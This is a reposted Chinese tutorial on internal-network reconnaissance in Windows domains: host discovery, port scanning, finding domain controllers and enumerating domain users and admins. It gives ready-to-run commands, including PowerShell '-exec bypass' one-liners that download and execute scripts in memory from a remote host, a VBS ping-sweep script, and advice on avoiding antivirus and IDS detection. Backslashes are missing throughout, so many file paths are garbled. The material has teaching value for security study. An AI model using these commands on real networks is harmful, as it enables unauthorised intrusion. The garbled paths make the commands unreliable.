内网渗透-内网信息收集

admin 2025年2月15日22:05:41评论4 views字数 2763阅读9分12秒阅读模式

1.判断是否有域

ipconfig /all
内网渗透-内网信息收集systeminfo
内网渗透-内网信息收集net config workstation
内网渗透-内网信息收集net time /domain

判断主域,一般域服务器都会同时作为时间服务器

这里分为3中情况:

存在域,并且当前用户是域用户
内网渗透-内网信息收集

不存在域,当前网络环境为工作组
内网渗透-内网信息收集

存在域,但当前用户不是域用户
内网渗透-内网信息收集

2.域内主机探测

(避免使用暴力扫描工具或图形化工具触发反病毒软件)
(可以在白天和晚上各探测一遍来分析主机的存活数量)
nbtscan.exe

下载链接:nbtscan-1.0.35.exe

内网渗透-内网信息收集

扫描结果
sharing:可能有打印共享服务
DC: 可能是域控制器
U=user:可能是登录名为user的用户
IIS:可能安装了IIS服务器
EXCHANEGE:可能安装了微软的exchange
?:未识别出该机器的NETBIOS资源,可使用-f继续扫描

利用icmp协议扫描

ping

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=”

内网渗透-内网信息收集

VBS

strSubNet = "192.168.33."
Set objFSO= CreateObject("Scripting.FileSystemObject")
Set objTS = objfso.CreateTextFile("C:Userstest1AppDataLocalTempres.txt")
For i = 1 To 254
strComputer = strSubNet & i
blnResult = Ping(strComputer)
If blnResult = True Then
objTS.WriteLine "Ping " & strComputer & " success!"
End If
Next

objTS.Close
WScript.Echo "Done!"
Function Ping(strComputer)
Set objWMIService = GetObject("winmgmts:\.rootcimv2")
Set colItems = objWMIService.ExecQuery("Select * From Win32_PingStatus Where Address='" & strComputer & "'")
For Each objItem In colItems
Select case objItem.StatusCode
Case 0
Ping = True
Case Else
Ping = False
End select
Exit For
Next
End Function

允许此脚本后会在%temp%路径下生成res.txt文件,里面会显示存活的主机名
内网渗透-内网信息收集
内网渗透-内网信息收集
利用ARP扫描

arp-scan

github下载链接:arp-scan.exe(需要特定网络环境)

内网渗透-内网信息收集
可见除了广播地址一共扫出来3个主机,而前面使用icmp只扫描出2个,这是因为有些有些系统默认是禁止ICMP的,所以使用多种方法更有效找到所有存活主机。

Nishang 中的 Invoke-ARPScan.ps1 脚本

github下载链接:Invoke-ARPScan.ps1(需要特定网络环境)

这里也有3中方式:

本地运行

powershell.exe -exec bypass -Command “& {Import-Module C:Userstest1DesktopInvoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.33.0/24}” >> C:Userstest1Desktoplog.txt

内网渗透-内网信息收集

远程运行

powershell.exe -exec bypass -c "IEX{New-Object Net.WebClient}.DownloadString(‘脚本地址’);invoke-ARPScan-CIDR 192.168.1.1/24">>C:windowstemplog.txt:
  1. 无文件运行(没有运行文件,在内存中运行)

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.33.1/PowerSploit-master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.33.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:windowstempres.txt"

利用TCP/UDP扫描探测

ScanLine

下载链接:ScanLine

sl.exe -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O C:Userstest1AppDataLocalTemplog.txt -p 192.168.33.1-254 /b

内网渗透-内网信息收集

3.域内端口扫描

扫描注意是否会触发IDS

Powersploit的invoke-portscan.ps1脚本

github下载链接:invoke-portscan.ps1

powershell.exe -exec bypass -Command "& {Import-Module "C:Userstest1AppDataLocalTempInvoke-Portscan.ps1";Invoke-Portscan -Hosts 192.168.33.0/24 -T 4 -ports '445,1433,80,8080,3389' -oA c:ProgramDataip_info"}

执行结束后会生成一个ip_info.xml的文件会显示出扫描结果:
内网渗透-内网信息收集命令格式:

powershell.exe -exec bypass -Command "& {Import-Module C:PowerView.ps1; powerview的命令参数}"

端口 Banner 信息
内网渗透-内网信息收集

4.域内控制器的查找

nltest /dclist:yuaneuro.cn
内网渗透-内网信息收集nslookup -type=SRV _ldap._tcp
net time /domain
net group "domain controllers" /domain
内网渗透-内网信息收集

5.域内用户和管理员的获取

查询所有域用户列表

net user /domain
内网渗透-内网信息收集wmic useraccount get /all
内网渗透-内网信息收集

net localgroup administrators /domain
内网渗透-内网信息收集dsquery user
只能在DC上执行
内网渗透-内网信息收集

查询域管理员用户组

net group "domain admins" /domain
内网渗透-内网信息收集net group "Enterprise admins" /domain
内网渗透-内网信息收集

本文作者:yuaneuro, 转载请注明来自FreeBuf.COM

原文始发于微信公众号(白帽子程序员):内网渗透-内网信息收集

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日22:05:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透-内网信息收集https://cn-sec.com/archives/1046970.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息